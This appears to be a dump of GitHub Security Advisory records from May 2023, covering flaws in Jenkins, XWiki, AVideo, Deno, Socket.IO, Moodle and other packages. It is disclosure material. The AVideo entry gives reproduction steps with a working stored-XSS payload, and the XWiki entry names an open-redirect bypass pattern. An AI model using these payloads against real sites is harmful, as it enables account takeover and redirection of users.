{'cwe_ids': ['CWE-248'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-03T21:56:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2c5c-fhr8-pwh9
|
2023-06-02T22:03:21Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32999']
|
Jenkins AppSpider Plugin missing permission check
|
Jenkins AppSpider Plugin 1.0.15 and earlier does not perform a permission check in a method implementing form validation.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.
Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
AppSpider Plugin 1.0.16 requires POST requests and Overall/Administer permission for the affected form validation method.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.rapid7:jenkinsci-appspider-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.15'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32999'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/appspider-build-scanner-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3121'}]
|
{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:37:09Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6gvj-8vc5-8v3j
|
2023-05-15T20:52:19Z
|
2023-05-15T20:52:19Z
| null |
['CVE-2023-32068']
|
org.xwiki.platform:xwiki-platform-oldcore Open Redirect vulnerability
|
### Impact
It's possible to exploit well known parameters in XWiki URLs to perform redirection to untrusted site. This vulnerability was partially fixed in the past for XWiki 12.10.7 and 13.3RC1 but there is still the possibility to force specific URLs to skip some checks, e.g. using URLs like `http:example.com` in the parameter would allow the redirect.
### Patches
The issue has now been patched against all patterns that we know about for performing redirect. It also performs a real URI parsing that should protect in most cases. This has been patched in XWiki 14.10.4 and 15.0.
### Workarounds
The only workaround is to upgrade XWiki.
### References
* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-20096
* JIRA ticket about the improvment actually fixing the vulnerability: https://jira.xwiki.org/browse/XWIKI-20549
* Previous advisory about open redirect: https://github.com/advisories/GHSA-jp55-vvmf-63mv
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
## Attribution
Thanks to Paulos Mesfin who originally reported the vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.10.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6gvj-8vc5-8v3j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32068'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e4f7f68e93cb08c25632c126356d218abf192d1e'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jp55-vvmf-63mv'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20096'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20549'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-15T20:52:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xr9h-p2rc-rpqm
|
2023-05-01T22:30:28Z
|
2023-05-01T22:30:28Z
| null |
['CVE-2023-30860']
|
WWBN/AVideo stored XSS vulnerability leads to takeover of any user's account, including admin's account
|
In AVideo, a normal user can make a Meeting Schedule where the user can invite another user in that Meeting, but I found out that it did not properly sanitize the malicious characters when creating a Meeting Room. This leads the attacker to put malicious scripts.
Impact:
Since any USER including the ADMIN can see the meeting room that was created by the attacker this can lead to cookie hijacking and takeover of any accounts without user interaction.
Step to Reproduce:
1. As normal USER go to Meet -> Schedule
https://demo.avideo.com/plugin/Meet/
2. In "Meet topic" field put XSS payload
Example: "><img src=x onerror=alert('Pawned+by+Gonz')>
3. Then click Save
4. Now as ADMIN go to Meet -> Schedule -> Upcoming
https://demo.avideo.com/plugin/Meet/
5. Then the XSS payload that normal USER created will be executed
Video POC: https://youtu.be/Nke0Bmv5F-o
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wwbn/avideo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/security/advisories/GHSA-xr9h-p2rc-rpqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30860'}, {'type': 'PACKAGE', 'url': 'https://github.com/WWBN/AVideo'}, {'type': 'WEB', 'url': 'https://youtu.be/Nke0Bmv5F-o'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T22:30:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-22fx-6r9m-r8h9
|
2023-06-02T21:18:04Z
|
2023-05-05T18:30:17Z
| null |
['CVE-2023-29659']
|
libheif vulnerable to segmentation fault via floating point exception
|
A Segmentation fault caused by a floating point exception exists in libheif 1.15.1 using crafted heif images via the heif::Fraction::round() function in box.cc, which causes a denial of service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/strukturag/libheif'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29659'}, {'type': 'WEB', 'url': 'https://github.com/strukturag/libheif/issues/794'}, {'type': 'WEB', 'url': 'https://github.com/strukturag/libheif/commit/e05e15b57a38ec411cb9acb38512a1c36ff62991'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKAE6NQBA3Q7GS6VTNDZRZZZVPPEFUEZ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LGKHDCS4HRZE3UGXYYDYPTIPNIBRLQ5L/'}, {'type': 'PACKAGE', 'url': 'github.com/strukturag/libheif'}]
|
{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T21:18:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vc52-gwm3-8v2f
|
2023-05-31T23:39:40Z
|
2023-05-31T23:39:40Z
| null |
['CVE-2023-33966']
|
Missing "--allow-net" permission check for built-in Node modules
|
### Impact
Outbound HTTP requests made using the built-in "node:http" or "node:https" modules are incorrectly not checked against the network permission allow list (`--allow-net`). Dependencies relying on these built-in modules are subject to the vulnerability too.
Users of Deno versions prior to 1.34.0 are unaffected. Deno Deploy users are unaffected.
### Patches
This problem has been patched in Deno v1.34.1 and all users are recommended to update to this version.
### Workarounds
No workaround is available for this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.34.0'}, {'fixed': '1.34.1'}]}], 'versions': ['1.34.0']}, {'package': {'ecosystem': 'crates.io', 'name': 'deno_runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.114.0'}, {'fixed': '0.115.0'}]}], 'versions': ['0.114.0']}]
|
[{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-vc52-gwm3-8v2f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33966'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/releases/tag/v1.34.1'}]
|
{'cwe_ids': ['CWE-269', 'CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-31T23:39:40Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qwhm-h7v3-mrjx
|
2023-05-30T09:05:58Z
|
2023-05-25T17:01:12Z
| null |
['CVE-2023-33192']
|
Improper handling of NTS cookie length that could crash the ntpd-rs server
|
### Impact
ntpd-rs does not validate the length of NTS cookies in received NTP packets to the server. An attacker can crash the server by sending a specially crafted NTP packet containing a cookie shorter than what the server expects. The server also crashes when it is not configured to handle NTS packets.
ntpd-rs running purely as an ntp client is not affected.
### Patches
The issue was caused by improper slice indexing. The indexing operations were replaced by safer alternatives that do not crash the ntpd-rs server process but instead properly handle the error condition. A patch was released in version 0.3.3
### Workarounds
ntpd-rs running purely as an ntp client is not affected. By default, ntpd-rs packages are not configured to run as a server.
For machines where serving the time is required, there is no known workaround. Users are recommended to upgrade ntpd-rs as soon as possible.
### References
https://github.com/pendulum-project/ntpd-rs/pull/752
We would like to thank @mlichvar for identifying this issue
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'ntpd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/security/advisories/GHSA-qwhm-h7v3-mrjx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33192'}, {'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/pull/752'}, {'type': 'PACKAGE', 'url': 'https://github.com/pendulum-project/ntpd-rs'}, {'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/releases/tag/v0.3.3'}]
|
{'cwe_ids': ['CWE-130'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-25T17:01:12Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x99j-r8vv-gwwj
|
2023-05-11T16:39:47Z
|
2023-05-11T16:39:47Z
| null |
['CVE-2023-32075']
|
Pimcore vulnerable to Business Logic Errors via Customer automation rules
|
### Impact
Business Logic Errors in the Conditions tab since the counter can be a negative number.
This vulnerability is capable of the unlogic in the counter value in the Conditions tab.
### Patches
Update to version 3.3.9 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/e3f333391582d9309115e6b94e875367d0ea7163.patch
### Workarounds
Apply https://github.com/pimcore/customer-data-framework/commit/e3f333391582d9309115e6b94e875367d0ea7163.patch manually.
### References
https://huntr.dev/bounties/cecd7800-a996-4f3a-8689-e1c2a1e0248a/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-x99j-r8vv-gwwj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32075'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/e3f333391582d9309115e6b94e875367d0ea7163.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/releases/tag/v3.3.9'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cecd7800-a996-4f3a-8689-e1c2a1e0248a/'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T16:39:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4gm9-c9jq-g523
|
2023-05-19T23:46:03Z
|
2023-05-19T18:30:25Z
| null |
['CVE-2023-2666']
|
Froxlor vulnerable to Allocation of Resources Without Limits or Throttling
|
Froxlor prior to 2.0.16 has a password reset page with no rate limit.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.16'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2666'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/1679675aa1c29d24344dd2e091ff252accb111d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0bbdc9d4-d9dc-4490-93ef-0a83b451a20f'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-19T23:46:03Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w766-3572-f2hv
|
2023-05-17T15:37:46Z
|
2023-05-11T20:42:37Z
| null |
['CVE-2023-2630']
|
Pimcore Cross-site Scripting (XSS) vulnerability in Admin Translations
|
### Impact
Execute Javascript code on victim browsers and potentially steal cookies to takeover their account.
### Patches
Update to version 10.5.21 or apply this patches manually
https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38.patch
### Workarounds
Apply patches manually: https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38.patch
### References
https://huntr.dev/bounties/e1001870-b8d8-4921-8b9c-bbdfb1a1491e/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-w766-3572-f2hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2630'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e1001870-b8d8-4921-8b9c-bbdfb1a1491e'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:42:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-hqxw-f8mx-cpmw
|
2023-05-11T20:37:54Z
|
2023-05-11T20:37:54Z
| null |
['CVE-2023-2253']
|
distribution catalog API endpoint can lead to OOM via malicious user input
|
### Impact
Systems that run `distribution` built after a specific commit running on memory-restricted environments can suffer from denial of service by a crafted malicious `/v2/_catalog` API endpoint request.
### Patches
Upgrade to at least 2.8.2-beta.1 if you are running `v2.8.x` release. If you use the code from the main branch, update at least to the commit after [f55a6552b006a381d9167e328808565dd2bf77dc](https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc).
### Workarounds
There is no way to work around this issue without patching. Restrict access to the affected API endpoint: see the recommendations section.
### References
`/v2/_catalog` endpoint accepts a parameter to control the maximum amount of records returned (query string: `n`).
When not given the default `n=100` is used. The server trusts that `n` has an acceptable value, however when using a
maliciously large value, it allocates an array/slice of `n` of strings before filling the slice with data.
This behaviour was introduced ~7yrs ago [1].
### Recommendation
The `/v2/_catalog` endpoint was designed specifically to do registry syncs with search or other API systems. Such an endpoint would create a lot of load on the backend system, due to overfetch required to serve a request in certain implementations.
Because of this, we strongly recommend keeping this API endpoint behind heightened privilege and avoiding leaving it exposed to the internet.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [distribution repository](https://github.com/distribution/distribution)
* Email us at [cncf-distribution-security@lists.cncf.io](mailto:cncf-distribution-security@lists.cncf.io)
[1] [faulty commit](https://github.com/distribution/distribution/blob/b7e26bac741c76cb792f8e14c41a2163b5dae8df/registry/handlers/catalog.go#L45)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/docker/distribution'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2-beta.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2253'}, {'type': 'WEB', 'url': 'https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2189886'}, {'type': 'PACKAGE', 'url': 'https://github.com/distribution/distribution'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/06/msg00035.html'}]
|
{'cwe_ids': ['CWE-475', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:37:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p2fh-2h23-6grg
|
2023-06-02T17:11:18Z
|
2023-05-30T12:30:17Z
| null |
['CVE-2023-2972']
|
antfu/utils vulnerable to prototype pollution
|
Prototype Pollution in GitHub repository antfu/utils prior to 0.7.3.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@antfu/utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2972'}, {'type': 'WEB', 'url': 'https://github.com/antfu/utils/commit/7f8b16c6181c988bdb96613fbb2533b345f68682'}, {'type': 'PACKAGE', 'url': 'https://github.com/antfu/utils'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/009f1cd9-401c-49a7-bd08-be35cff6faef'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:11:18Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4cvp-hr63-822j
|
2023-05-05T02:19:11Z
|
2023-05-05T02:19:11Z
| null |
['CVE-2023-31048']
|
Exposure of Sensitive Information in OPC UA .NET Standard Reference Server
|
This security update resolves a vulnerability in the OPC UA .NET Standard Reference Server that allows
remote attackers to send malicious requests that expose sensitive information.
https://files.opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2023-31048.pdf
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.371.86'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua.Server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.371.86'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/security/advisories/GHSA-4cvp-hr63-822j'}, {'type': 'PACKAGE', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:19:11Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cqmj-92xf-r6r9
|
2023-06-05T21:07:58Z
|
2023-05-23T19:55:13Z
| null |
['CVE-2023-32695']
|
Insufficient validation when decoding a Socket.IO packet
|
### Impact
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
```
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
```
### Patches
A fix has been released today (2023/05/22):
- https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3, included in `socket.io-parser@4.2.3`
- https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced, included in `socket.io-parser@3.4.3`
| `socket.io` version | `socket.io-parser` version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| `4.5.2...latest` | `~4.2.0` ([ref](https://github.com/socketio/socket.io/commit/9890b036cf942f6b6ad2afeb6a8361c32cd5d528)) | `npm audit fix` should be sufficient |
| `4.1.3...4.5.1` | `~4.1.1` ([ref](https://github.com/socketio/socket.io/commit/7c44893d7878cd5bba1eff43150c3e664f88fb57)) | Please upgrade to `socket.io@4.6.x` |
| `3.0.5...4.1.2` | `~4.0.3` ([ref](https://github.com/socketio/socket.io/commit/752dfe3b1e5fecda53dae899b4a39e6fed5a1a17)) | Please upgrade to `socket.io@4.6.x` |
| `3.0.0...3.0.4` | `~4.0.1` ([ref](https://github.com/socketio/socket.io/commit/1af3267e3f5f7884214cf2ca4d5282d620092fb0)) | Please upgrade to `socket.io@4.6.x` |
| `2.3.0...2.5.0` | `~3.4.0` ([ref](https://github.com/socketio/socket.io/commit/cf39362014f5ff13a17168b74772c43920d6e4fd)) | `npm audit fix` should be sufficient |
### Workarounds
There is no known workaround except upgrading to a safe version.
### For more information
If you have any questions or comments about this advisory:
- Open a discussion [here](https://github.com/socketio/socket.io/discussions)
Thanks to [@rafax00](https://github.com/rafax00) for the responsible disclosure.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.4'}, {'fixed': '4.2.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32695'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/commit/1c220ddbf45ea4b44bc8dbf6f9ae245f672ba1b9'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/socketio/socket.io-parser'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/releases/tag/4.2.3'}]
|
{'cwe_ids': ['CWE-20', 'CWE-754'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-23T19:55:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-hh7j-pg39-q563
|
2023-05-30T06:41:13Z
|
2023-05-24T17:38:52Z
| null |
['CVE-2023-33175']
|
toui allows user-specific variables to be shared between users
|
### Impact
Websites that use `Website.user_vars` property in versions.
### Patches
It affects versions v2.0.1 to v2.4.0. Please upgrade to v2.4.1
### Workarounds
Do not use `Website.user_vars` in websites when using versions v2.0.1 to v2.4.0. Also, do not use `Website.signin_user()` in version v2.4.0 only.
### Explanation
ToUI is using Flask-Caching (SimpleCache) to store user variables. My misunderstanding was that these caches are stored in the client's browser, but it seems that these are stored in the server side.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'toui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.1'}, {'fixed': '2.4.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/mubarakalmehairbi/ToUI/security/advisories/GHSA-hh7j-pg39-q563'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33175'}, {'type': 'PACKAGE', 'url': 'https://github.com/mubarakalmehairbi/ToUI'}, {'type': 'WEB', 'url': 'https://github.com/mubarakalmehairbi/ToUI/releases/tag/v2.4.1'}]
|
{'cwe_ids': ['CWE-913', 'CWE-914'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:38:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w2pm-fr62-jgv4
|
2023-05-25T19:07:51Z
|
2023-05-16T21:30:23Z
| null |
['CVE-2021-27131']
|
Moodle vulnerable to stored Cross-site Scripting
|
Moodle 3.10.1 is vulnerable to persistent/stored cross-site scripting (XSS) due to the improper input sanitization on the "Additional HTML Section" via "Header and Footer" parameter in `/admin/settings.php`. This vulnerability may lead an attacker to steal admin and all user account cookies by storing the malicious XSS payload in Header and Footer.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.10.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27131'}, {'type': 'WEB', 'url': 'https://docs.moodle.org/402/en/Risks'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://github.com/p4nk4jv/CVEs-Assigned/blob/master/Moodle-3.10.1-CVE-2021-27131.md'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:05:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wwxh-74fx-33c6
|
2023-05-01T14:01:02Z
|
2023-05-01T14:01:02Z
| null |
['CVE-2023-30857']
|
Possible prototype pollution in metadata record, when using meta decorator
|
### Impact
Possible prototype pollution for the `MetadataRecord`, when merged with a base class' metadata object, in `meta` decorator from the `@aedart/support` package.
The likelihood is questionable, given that a class' metadata can only be set or altered when the class is decorated via `meta()`. Furthermore, object(s) of sensitive nature would have to be stored as metadata, before this can become a vulnerability.
### Patches
Has been patched in version `0.6.1`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@aedart/support'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/aedart/ion/security/advisories/GHSA-wwxh-74fx-33c6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30857'}, {'type': 'WEB', 'url': 'https://github.com/aedart/ion/commit/c3e2ee08710d4164d796ecb66ed291335dae9291'}, {'type': 'PACKAGE', 'url': 'https://github.com/aedart/ion'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T14:01:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wxrx-pc44-rcgc
|
2023-05-30T20:07:35Z
|
2023-05-27T06:30:41Z
| null |
['CVE-2023-26128']
|
keep-module-latest vulnerable to Command Injection due to missing input sanitization
|
All versions of the package keep-module-latest are vulnerable to Command Injection due to missing input sanitization or other checks and sandboxes being employed to the installModule function.
**Note:**
To execute the code snippet and potentially exploit the vulnerability, the attacker needs to have the ability to run Node.js code within the target environment. This typically requires some level of access to the system or application hosting the Node.js environment.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'keep-module-latest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]
